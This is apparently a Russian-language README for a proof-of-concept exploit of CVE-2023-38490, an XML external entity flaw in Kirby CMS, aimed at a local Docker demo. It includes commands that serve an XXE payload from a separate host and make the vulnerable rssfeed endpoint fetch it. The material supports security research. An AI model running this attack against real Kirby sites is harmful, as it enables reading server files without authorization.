
Kirby < 3.9.6 XML External Entity эксплойт
Kirby < 3.9.6 XML-внешняя сущность
Эксплойт для CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
Сборка и запуск уязвимого демо-приложения:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
Обслуживание демонстрационной полезной нагрузки:
Примечание: выберите адрес привязки, к которому может получить доступ docker-контейнер.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
Запуск эксплойта:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
Уязвимая функция присутствует в ядре Kirby, но не используется по умолчанию в Kirby Core, Kirby StarterKit или Kirby PlainKit. Это означает, что уязвимость не затронет вас при конфигурации по умолчанию, но может быть внедрена при индивидуальной разработке или установке плагина, использующего затронутый инструментарий.
ACCEIS не пропагандирует и не поощряет любую незаконную деятельность. Все материалы, предоставленные в этом репозитории, предназначены только для исследований, обучения и обнаружения угроз.